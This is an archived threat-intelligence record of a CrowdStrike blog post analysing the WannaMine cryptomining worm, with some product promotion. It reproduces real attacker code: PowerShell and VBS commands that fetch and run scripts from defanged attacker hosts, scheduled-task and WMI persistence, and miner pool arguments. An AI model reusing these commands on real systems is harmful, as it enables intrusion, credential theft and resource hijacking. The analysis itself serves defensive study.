{
	"id": "9b0f8d14-0d32-49c9-8b9c-e7ff5b0637bd",
	"created_at": "2026-04-06T00:06:48.019581Z",
	"updated_at": "2026-04-10T03:28:20.572119Z",
	"deleted_at": null,
	"sha1_hash": "9405edda747804e76712746f2b8310e6d3246cdc",
	"title": "Cryptomining: Harmless Nuisance or Disruptive Threat?",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 611748,
	"plain_text": "Cryptomining: Harmless Nuisance or Disruptive Threat?\r\nBy rmcc.jb.ks\r\nArchived: 2026-04-02 10:39:30 UTC\r\nCryptocurrencies are in high demand. The usage and monetary value of Bitcoin, Litecoin, Ethereum, and many\r\nothers have skyrocketed worldwide. The increase in purchasing power and liquidity is driving valuations, as well\r\nas volatility, higher than ever before. Naturally, where there are profits to be had, crime is not far behind.\r\nCybercriminals have honed in on a highly profitable opportunity, using a distributed computing process for\r\nproduction of cryptocurrency — a process known as “mining.” Cryptocurrency mining is a resource-intensive\r\nprocess of authenticating transactions in return for a cryptocurrency reward. While mining itself is legal,\r\nfraudulently compromising systems to do the work is not. In recent months, CrowdStrike® has noticed an uptick\r\nin cyberattacks focused on cryptocurrency-mining tools that commandeer available CPU cycles, without\r\nauthorization, to make money. While cryptocurrency mining has typically been viewed as a nuisance,\r\nCrowdStrike has recently seen several cases where mining has impacted business operations, rendering some\r\ncompanies unable to operate for days and weeks at a time. The tools have caused systems and applications to\r\ncrash due to such high CPU utilization speeds. Furthermore, CrowdStrike has observed more sophisticated\r\ncapabilities built into a cryptomining worm dubbed WannaMine. This tool leverages persistence mechanisms and\r\npropagation techniques similar to those used by nation-state actors, demonstrating a trend highlighted in the recent\r\nCrowdStrike Cyber Intrusion Services Casebook 2017, which states that “contemporary attacks continue to blur\r\nthe lines between nation-state and eCrime tactics.” WannaMine employs “living off the land” techniques such as\r\nWindows Management Instrumentation (WMI) permanent event subscriptions as a persistence mechanism. 
It also\r\npropagates via the EternalBlue exploit popularized by WannaCry. Its fileless nature and use of legitimate system\r\nsoftware such as WMI and PowerShell make it difficult, if not impossible, for organizations to block it without\r\nsome form of next-generation antivirus. WannaMine, first reported by PandaSecurity, is a Monero cryptocurrency\r\nminer that hijacks a system’s CPU cycles to mine. This fileless malware leverages advanced tactics and techniques\r\nto maintain persistence within a network and move laterally from system to system. First, WannaMine uses\r\ncredentials acquired with the credential harvester Mimikatz to attempt to propagate and move laterally with\r\nlegitimate credentials. If unsuccessful, WannaMine attempts to exploit the remote system with the EternalBlue\r\nexploit used by WannaCry in early 2017. In one case, a client informed CrowdStrike that nearly 100 percent of its\r\nenvironment was rendered unusable due to overutilization of systems’ CPUs. Upon deployment of the\r\nCrowdStrike Falcon® endpoint protection platform, with default prevention capabilities, the client restored 80\r\npercent of its operational capability. With script blocking enabled, the client achieved 95 percent operational\r\ncapability within a couple of hours. Figure 1 below demonstrates the impact Falcon with script blocking had by\r\nimmediately blocking the WannaMine activity. 
This figure shows all suspicious detection activities across the\r\nclient’s enterprise, and the significant decline in critical detections due to blocked execution of WannaMine\r\nfeatures via Falcon script blocking.\r\nhttps://www.crowdstrike.com/blog/cryptomining-harmless-nuisance-disruptive-threat/\r\nPage 1 of 7\n\nFigure 1\r\nUpon deployment of the Falcon platform, CrowdStrike identified the tell-tale execution signs of WannaMine.\r\nSnippets of exploit code are shown in Figures 2 and 3, and the scheduled task is shown in Figure 4.\r\npowershell.exe -NoP -NonI -W Hidden -E\r\nJABzAHQAaQBtAGUAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBUAGkAYwBrAEMAbwB1AG4AdAANAA…\r\nFigure 2. Truncated base64-encoded PowerShell command\r\ncmd /v:on /c for /f \"tokens=2 delims=.\u003c\" %i in ('ver') do (set a=%i)\u0026if !a:~-1!==5 (@echo on error\r\nresume next\u003e%windir%\\11.vbs\u0026@echo Set ox=CreateObject^(\"MSXML2.XMLHTTP\"^)\u003e\u003e%windir%\\11.vbs\u0026@echo\r\nox.open \"GET\",\"http\u003c:\u003e//118.184.48\u003c.\u003e95:8000/info.vbs\",false\u003e\u003e%windir%\\11.vbs\u0026@echo\r\nox.setRequestHeader \"User-Agent\", \"-\"\u003e\u003e%windir%\\11.vbs\u0026@echo ox.send^(^)\u003e\u003e%windir%\\11.vbs\u0026@echo If\r\nox.Status=200 Then\u003e\u003e%windir%\\11.vbs\u0026@echo Set\r\noas=CreateObject^(\"ADODB.Stream\"^)\u003e\u003e%windir%\\11.vbs\u0026@echo oas.Open\u003e\u003e%windir%\\11.vbs\u0026@echo oas.Type=1\r\n\u003e\u003e%windir%\\11.vbs\u0026@echo oas.Write ox.ResponseBody\u003e\u003e%windir%\\11.vbs\u0026@echo oas.SaveToFile\r\n\"%windir%\\info.vbs\",2 \u003e\u003e%windir%\\11.vbs\u0026@echo oas.Close\u003e\u003e%windir%\\11.vbs\u0026@echo End\r\nif\u003e\u003e%windir%\\11.vbs\u0026@echo Set os=CreateObject^(\"WScript.Shell\"^)\u003e\u003e%windir%\\11.vbs\u0026@echo\r\nos.Exec^(\"cscript.exe %windir%\\info.vbs\"^)\u003e\u003e%windir%\\11.vbs\u0026cscript.exe %windir%\\11.vbs) else\r\n(powershell -NoP -NonI -W Hidden 
\"if((Get-WmiObject\r\nWin32_OperatingSystem).osarchitecture.contains('64')){IEX(New-Object\r\nNet.WebClient).DownloadString('http\u003c:\u003e//118.184.48\u003c.\u003e95:8000/info6.ps1')}else{IEX(New-Object\r\nNet.WebClient).DownloadString('http\u003c:\u003e//118.184.48\u003c.\u003e95:8000/info3.ps1')}\")\r\nFigure 3\r\ncmd /c echo powershell -nop \"$a=((Get-WMIObject -Namespace root\\Subscription -Class\r\n__FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('SCM Event Filter')))) {IEX(New-Object Net.WebClient).DownloadString('http\u003c:\u003e//stafftest.spdns\u003c.\u003eeu:8000/mate6.ps1')}\" \u003e%temp%\\y1.bat\r\n\u0026\u0026 SCHTASKS /create /RU System /SC DAILY /TN yastcat /f /TR \"%temp%\\y1.bat\" \u0026\u0026SCHTASKS /run /TN\r\nyastcat\r\nFigure 4\r\nThis blog will touch on the files downloaded in Figures 3 and 4 later, but first, let’s address WannaMine’s WMI\r\nfeatures. 
Starting with an analysis of the base64-decoded output from Figure 2, we can see references to many WMI\r\nclass functions – none of which look legitimate at first glance.\r\n… $funs = ( 'root\\default:Win32_TaskService').Properties\u003c'funs'\u003e.Value … Get-WmiObject\r\n__FilterToConsumerBinding -Namespace root\\subscription | Where-Object {$_.filter -notmatch 'SCM\r\nEvent'} | Remove-WmiObject … $cmdmon=\"powershell -NoP -NonI -W Hidden `\"`$mon = (\r\n'root\\default:Win32_TaskService').Properties\u003c'mon'\u003e.Value;`$funs = (\r\n'root\\default:Win32_TaskService').Properties\u003c'funs'\u003e.Value ;iex\r\n(::ASCII.GetString(::FromBase64String(`$funs)));Invoke-Command -ScriptBlock `$RemoteScriptBlock -\r\nArgumentList @(`$mon, `$mon, 'Void', 0, '', '')`\"\" … $mimi = (\r\n'root\\default:Win32_TaskService').Properties\u003c'mimi'\u003e.Value … $ipsu = (\r\n'root\\default:Win32_TaskService').Properties\u003c'ipsu'\u003e.Value $i17 = (\r\n'root\\default:Win32_TaskService').Properties\u003c'i17'\u003e.Value $scba= (\r\n'root\\default:Win32_TaskService').Properties\u003c'sc'\u003e.Value …\r\nFigure 5\r\nIn a previous blog, CrowdStrike highlighted the use of WmiClass, a type of accelerator for ManagementClass, or a\r\nshortcut to a WMI class definition. In this instance, the functions residing within the Win32_TaskService WMI\r\nclass look legitimate at first glance, because the class has a similar naming convention to other WMI classes.\r\nHowever, by querying the above definitions in that class, we can see it is not legitimate. 
Descriptions of the\r\ncontents of the properties can be seen in the table below.\r\nWin32_TaskService\r\nProperty  Function\r\nmon  Monero CPU miner\r\nmimi  Mimikatz credential harvesting tool\r\nfuns  Combination of publicly available scripts to achieve remote DLL loading via WMI and obfuscated EternalBlue\r\ni17  Targeting\r\nipsu  Targeting\r\nsc  yastcat Scheduled Task configuration\r\nJust to make sure we’ve identified all the functions within this class, we’ll query all the contents of the class and\r\nsee that there are two additional functions, “vcp” and “vcr.” These two functions correspond to two Visual C++\r\nredistributable DLL files, msvcp120.dll and msvcr120.dll. This shows that the malware chooses not to rely on the\r\nimpacted system for dependencies and will bring along all code needed to function properly. The clear takeaway\r\nfrom analysis of this malicious WMI class is that WannaMine is leveraging the WMI repository to store code for\r\nexecution. So how is the code in Figure 1 executing? Let’s start by considering y1.bat, identified in the scheduled\r\ntask shown in Figure 4.\r\npowershell -nop \"$a=((Get-WMIObject -Namespace root\\Subscription -Class __FilterToConsumerBinding\r\n));if(($a -eq $null) -or (!($a.contains('SCM Event Filter')))) {IEX(New-Object\r\nNet.WebClient).DownloadString('http\u003c:\u003e//stafftest.spdns\u003c.\u003eeu:8000/mate6.ps1')}\"\r\nFigure 6. Contents of y1.bat\r\nThis is not extremely helpful to our understanding of the attack, as it’s only performing the download\r\nfunctionality. But this is not the first time we’ve seen a check being performed for “SCM Event Filter” within\r\nWMI Filter to Consumer Bindings (see Figure 2 above). 
Let’s check into permanent event subscriptions, since\r\nWannaMine named the malicious WMI class to blend in.\r\nFigure 7\r\nSure enough, WannaMine is leveraging permanent event subscriptions to maintain persistence. This permanent\r\nevent subscription is set to execute the PowerShell command located in the Event Consumer every 90 minutes,\r\nper the Event Filter. Let’s circle back to the files downloaded in Figures 3 and 4. The batch script in Figure 3 first\r\nchecks the Windows version of the system it is running on by issuing the command “CMD /V:ON /C”. If the\r\nWindows Version is 5, in other words if the current system is running either Windows 2000, Windows XP,\r\nWindows XP 64-Bit, Windows Server 2003, or Windows Server 2003 R2, the script will drop a file named 11.vbs\r\nin C:\\Windows. The following are the contents of the script:\r\nON ERROR RESUME NEXT\r\nSET OX=CREATEOBJECT(\"MSXML2.XMLHTTP\")\r\nOX.OPEN \"GET\",\"HTTP\u003c:\u003e//STAFFTEST.FIREWALL-GATEWAY\u003c.\u003eCOM:8000/INFO.VBS\",FALSE\r\nOX.SETREQUESTHEADER \"USER-AGENT\", \"-\"\r\nOX.SEND()\r\nIF OX.STATUS=200 THEN\r\nSET OAS=CREATEOBJECT(\"ADODB.STREAM\")\r\nOAS.OPEN\r\nOAS.TYPE=1\r\nOAS.WRITE OX.RESPONSEBODY\r\nOAS.SAVETOFILE \"C:\\Windows\\INFO.VBS\",2\r\nOAS.CLOSE\r\nEND IF\r\nSET OS=CREATEOBJECT(\"WSCRIPT.SHELL\")\r\nOS.EXEC(\"CSCRIPT.EXE C:\\Windows\\INFO.VBS\")\r\nFigure 8\r\nThis script is responsible for calling out to stafftest.firewall-gateway\u003c.\u003ecom to download another vbs file named\r\ninfo.vbs, saving it in C:\\Windows and then executing it via cscript.exe. It should be noted that CrowdStrike\r\nanalysts also analyzed info.vbs, which is downloaded by the original batch script. 
The following is a snippet of the\r\ndeobfuscated file:\r\nSub WriteBinary(FileName, Buf)\r\nConst adTypeBinary = 1\r\nConst adSaveCreateOverWrite = 2\r\nDim stream, xmldom, node\r\nSet xmldom = CreateObject(\"Microsoft.XMLDOM\")\r\nSet node = xmldom.CreateElement(\"binary\")\r\nnode.DataType = \"bin.base64\"\r\nnode.Text = Buf\r\nSet stream = CreateObject(\"ADODB.Stream\")\r\nstream.Type = adTypeBinary\r\nstream.Open\r\nstream.write node.NodeTypedValue\r\nstream.saveToFile FileName, adSaveCreateOverWrite\r\nstream.Close\r\nSet stream = Nothing\r\nSet node = Nothing\r\nSet xmldom = Nothing\r\nEnd Sub\r\nbytes = \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASAAAAA4fug4AtAnNU\r\nFigure 9\r\nThe file decodes a base64-encoded binary embedded within itself, saves it in the %TEMP% folder and executes it\r\nwith the following (sanitized) command line:\r\n-B -o stratum+tcp://pool.supportxmr\u003c.\u003ecom:80 -u\r\n46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE -o\r\nstratum+tcp://mine.xmrpool\u003c.\u003enet:80 -u\r\n46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE -o\r\nstratum+tcp://pool.minemonero\u003c.\u003epro:80 -u\r\n46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE -p x\r\nFigure 10\r\nThis is the actual payload responsible for utilizing the victim computer’s CPU cycles to mine Monero\r\ncryptocurrency. 
The following is the information regarding the binary:\r\nFile: taskservice.exe Size: 180736 MD5: 9AC3BDB9378CD1FAFBB8E08DEF738481 Compiled: Thu, Aug 31\r\n2017, 13:31:24 - 32 Bit EXE\r\nFigure 11\r\nIf the Windows version is Windows Vista or above, the batch script will issue the following PowerShell\r\ncommand:\r\nPOWERSHELL -NOP -NONI -W HIDDEN \"IF((GET-WMIOBJECT\r\nWIN32_OPERATINGSYSTEM).OSARCHITECTURE.CONTAINS('64')){IEX(NEW-OBJECT\r\nNET.WEBCLIENT).DOWNLOADSTRING('HTTP\u003c:\u003e//STAFFTEST.FIREWALL-GATEWAY\u003c.\u003eCOM:8000/INFO6.PS1')}ELSE{IEX(NEW-OBJECT\r\nNET.WEBCLIENT).DOWNLOADSTRING('HTTP\u003c:\u003e//STAFFTEST.FIREWALL-GATEWAY\u003c.\u003eCOM:8000/INFO3.PS1')}\")\r\nFigure 12\r\nIf the OS architecture is 64-bit, the script will call out to the aforementioned domain and download info6.ps1,\r\notherwise it downloads info3.ps1. Recovering info6.ps1 and mate6.ps1 was possible and allowed CrowdStrike to\r\nunderstand how WannaMine was creating the malicious WMI class and subsequent properties. The two files are\r\nsimilar, with minor changes depending on the OS architecture. 
After decoding the heavily obfuscated info6.ps1,\r\nwe see the WMI properties being set in Figure 13.\r\n$mimi=$fa.substring(0,1131864)\r\n$mon=$fa.substring(1131866,357720)\r\n$vcp=$fa.substring(1489588,880172)\r\n$vcr=$fa.substring(2369762,1284312)\r\n$funs=$fa.substring(3654076,497360)\r\n$sc=$fa.substring(4151438)\r\n$StaticClass = New-Object Management.ManagementClass(('root\\default'),$null,$null)\r\n$StaticClass.Name=('Win32_TaskService')\r\n$StaticClass.Put() | Out-Null\r\n$StaticClass.Properties.Add(('mimi'),$mimi)\r\n$StaticClass.Put() | Out-Null\r\n$StaticClass.Properties.Add(('mon'),$mon)\r\n$StaticClass.Put() | Out-Null\r\n$StaticClass.Properties.Add(('vcp'),$vcp)\r\n$StaticClass.Put() | Out-Null\r\n$StaticClass.Properties.Add(('vcr'),$vcr)\r\n$StaticClass.Put() | Out-Null\r\n$StaticClass.Properties.Add(('funs'),$funs)\r\n$StaticClass.Put() | Out-Null\r\n$StaticClass.Properties.Add('sc',$sc)\r\n$StaticClass.Put() | Out-Null\r\n$StaticClass.Properties.Add(('ipsu'),\"\")\r\n$StaticClass.Put() | Out-Null\r\n$StaticClass.Properties.Add(('i17'),\"\")\r\n$StaticClass.Put() | Out-Null\r\nFigure 13\r\nCrowdStrike anticipates that these threat actors will continue to evolve their capabilities to go undetected. For\r\nexample, while writing this post, CrowdStrike analysts downloaded the current version of info6.ps1 from the\r\nadversary’s infrastructure. It contained similar code to create a malicious WMI class; however, the class\r\nwas named “Office_Updater” instead of “Win32_TaskService”.\r\nConclusion\r\nWhile the tactics, techniques, and procedures (TTPs) displayed in WannaMine did not require a high degree of\r\nsophistication, the attack clearly stands on the shoulders of more innovative and enterprising nation-state and\r\neCrime threat actors. 
Whatever these threat actors may lack in sophistication, they made up for in resourcefulness:\r\nwe should appreciate the lengths they went to in pursuit of their goals, and what they learned from the public\r\nsuccesses and failures of other threat actors. In doing so, we take a vital step toward promoting a stronger security\r\nposture, better controls, and more disruptive defensive tactics. Companies should focus on strengthening their\r\nprevention, detection, and response capabilities to ensure that they are able to detect these TTPs. Improved\r\ndefenses will become even more critical in 2018 as we expect to see continued convergence of sophisticated\r\nstatecraft and tradecraft.\r\nFalcon Endpoint Protection Platform (EPP)\r\nThe prevention features of CrowdStrike Falcon® EPP offer ample protection against this threat within your\r\nenvironment. The redacted screenshot below demonstrates Falcon’s WannaMine prevention in action.\r\nFigure 14\r\nCrowdStrike expects to see much more cryptomining activity in 2018, resulting in business disruptions and\r\ndowntime that can impact the bottom line. As organizations and companies come to understand how these\r\ntraditionally unsophisticated actors are using increasingly sophisticated tactics, they can take a vital step toward\r\npromoting a stronger security posture and avoiding unnecessary interruptions that can affect critical business\r\nprocesses. Learn more about the CrowdStrike Falcon® platform\r\nand get full access to CrowdStrike's next-gen antivirus solution for 15 days by visiting the Falcon Prevent free\r\ntrial page.\r\nDownload a white paper: CrowdStrike Falcon®: Setting a New Standard in Endpoint Protection\r\nSource: https://www.crowdstrike.com/blog/cryptomining-harmless-nuisance-disruptive-threat/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.crowdstrike.com/blog/cryptomining-harmless-nuisance-disruptive-threat/"
	],
	"report_names": [
		"cryptomining-harmless-nuisance-disruptive-threat"
	],
	"threat_actors": [
		{
			"id": "81dde5cc-c29f-430d-8c6e-e5e92d5015e7",
			"created_at": "2022-10-25T16:07:23.704358Z",
			"updated_at": "2026-04-10T02:00:04.718034Z",
			"deleted_at": null,
			"main_name": "Harvester",
			"aliases": [],
			"source_name": "ETDA:Harvester",
			"tools": [
				"Agentemis",
				"Cobalt Strike",
				"CobaltStrike",
				"Graphon",
				"Metasploit",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434008,
	"ts_updated_at": 1775791700,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9405edda747804e76712746f2b8310e6d3246cdc.pdf",
		"text": "https://archive.orkl.eu/9405edda747804e76712746f2b8310e6d3246cdc.txt",
		"img": "https://archive.orkl.eu/9405edda747804e76712746f2b8310e6d3246cdc.jpg"
	}
}